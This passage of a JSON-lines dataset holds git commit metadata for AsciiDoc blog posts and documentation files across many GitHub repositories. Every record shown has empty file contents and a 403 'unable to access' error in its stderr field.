'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f040e6600e54d07b5979fa7bd035363e1203f61d","subject":"Create dev_env.adoc","message":"Create dev_env.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/dev_env.adoc","new_file":"docs\/dev_env.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c569c81fab5606aa28196e4018d0b0c3bc3765b","subject":"Update 2015-02-05-new-Blog.adoc","message":"Update 2015-02-05-new-Blog.adoc","repos":"nanox77\/nanox77.github.io,nanox77\/nanox77.github.io,nanox77\/nanox77.github.io","old_file":"_posts\/2015-02-05-new-Blog.adoc","new_file":"_posts\/2015-02-05-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanox77\/nanox77.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a4bf448b6b795daeb2be2a54f8fbd582e2d98a4","subject":"Update 2014-07-24-How-to-ban-classes.adoc","message":"Update 2014-07-24-How-to-ban-classes.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2014-07-24-How-to-ban-classes.adoc","new_file":"_posts\/2014-07-24-How-to-ban-classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5452416d6def21e6a9d8f20e427a37263fdd4f8d","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a5f546a9aa28123438b39544f6293b4247f3a8c","subject":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","message":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad3069edffd0083fe58457dc769535af7d116358","subject":"Update 2015-07-29-Test-posting.adoc","message":"Update 2015-07-29-Test-posting.adoc","repos":"gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress","old_file":"_posts\/2015-07-29-Test-posting.adoc","new_file":"_posts\/2015-07-29-Test-posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gendalf9\/gendalf9.github.io---hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adf2ccda201087f6795f73ec234ad9894b441ddb","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c5f9f7bb954f2b7a4e83c53a0dee5e7cf0b5f1d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1440b0adc3923f74d07a3b31c7c8089a7a081170","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4dffc717ca8a3fb669f2bf8d1a4d7fce1b4c4f3","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719945b182905c92c5bf501d5a4b62dd57fdfcbd","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1547acaee80f2e811360eff7daa8fc5626c7881e","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742678ab75812cf4e8578cafe868a7448cdfe580","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8e97664f24af64b6c77dd3964b7fbf4cb690000","subject":"Applied a few more changes","message":"Applied a few more changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a229bc56a74f473f18d5b6d2fc797da9336085e6","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c81f4f6a0c05387214671dbeab35605eec21d40a","subject":"Update 2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","message":"Update 2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_file":"_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fe5de96fd1bb518209510e4b6fc3ed39c5b117f","subject":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","message":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72cd28bbd2b215326638c49ea4e01f8748a390f1","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ee5b3e38b4c710701808a319f8f4c572afbd25e","subject":"y2b create post Unboxing The World's Most Expensive iPhone Case","message":"y2b create post Unboxing The World's Most Expensive iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-12-Unboxing-The-Worlds-Most-Expensive-iPhone-Case.adoc","new_file":"_posts\/2017-02-12-Unboxing-The-Worlds-Most-Expensive-iPhone-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77ca1bc3c9beeb83f41f3c4d55035373072803c8","subject":"Deleted _posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Deleted _posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f11f93001c77dd178eb2c1b0d36bc908165e1e5","subject":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179ee1b900474033f62ea83dfb9db7b822e2eee2","subject":"Update 2017-02-DOGMA-SCHRIFT.adoc","message":"Update 2017-02-DOGMA-SCHRIFT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-02-DOGMA-SCHRIFT.adoc","new_file":"_posts\/2017-02-DOGMA-SCHRIFT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0723e124b96eb28d087b6a4ca357b933a2f7f532","subject":"Update 2017-03-30-start-blog.adoc","message":"Update 2017-03-30-start-blog.adoc","repos":"chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io","old_file":"_posts\/2017-03-30-start-blog.adoc","new_file":"_posts\/2017-03-30-start-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chaseey\/chaseey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"319c29a869352e9a3d16b554eda155e81b4b8685","subject":"Update 2015-08-28-Script-for-recording-Winamp-visualizations.adoc","message":"Update 2015-08-28-Script-for-recording-Winamp-visualizations.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-08-28-Script-for-recording-Winamp-visualizations.adoc","new_file":"_posts\/2015-08-28-Script-for-recording-Winamp-visualizations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e90ad8b0a000f6b6849b2a0521ab1df5dcbc7492","subject":"Update 2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","message":"Update 2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","new_file":"_posts\/2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90bdc76acdd16fc087b965bd6bf0e33114266f62","subject":"Update 2016-7-8.adoc","message":"Update 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4f6ce4b91dd816ba220f42435c16289093cca95","subject":"Docs: fix some case problems in aliases.asciidoc (#23657)","message":"Docs: fix some case problems in aliases.asciidoc (#23657)\n\nMake more things uppercase.","repos":"ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,scottsom\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,sneivandt\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,mjason3\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/indices\/aliases.asciidoc","new_file":"docs\/reference\/indices\/aliases.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cef556664e691df8e49d55fcf30800f5f88575ba","subject":"Update 2016-10-25-Genetica.adoc","message":"Update 2016-10-25-Genetica.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-25-Genetica.adoc","new_file":"_posts\/2016-10-25-Genetica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41fcbb911b760539be2dab986d3c3f5e936cb245","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53411d37194578466513f76a1de475b89801d739","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a5c386deff477f3afaf6439790e8285fb93dfb4","subject":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18b96aed5bfd3285a1071c3cfec3b4011fc8bce4","subject":"Update 2016-12-2-3-Dpen.adoc","message":"Update 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-Dpen.adoc","new_file":"_posts\/2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"855e2ca2e28be1122725291d10a1970563abfbfa","subject":"Update 2017-03-27-tor-relay-on-windows.adoc","message":"Update 2017-03-27-tor-relay-on-windows.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2017-03-27-tor-relay-on-windows.adoc","new_file":"_posts\/2017-03-27-tor-relay-on-windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1feb8cf448acc767f7c3929f86a32e9462e8655","subject":"Update dbm-drop-all.adoc","message":"Update dbm-drop-all.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-drop-all.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-drop-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"930b5db4448db5f7884a26833888db956c1b8c6a","subject":"Update 2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","message":"Update 2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","new_file":"_posts\/2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e95021884e206186b03c8dc076b44658731c549","subject":"- Initial version of the release documentation","message":"- Initial version of the release 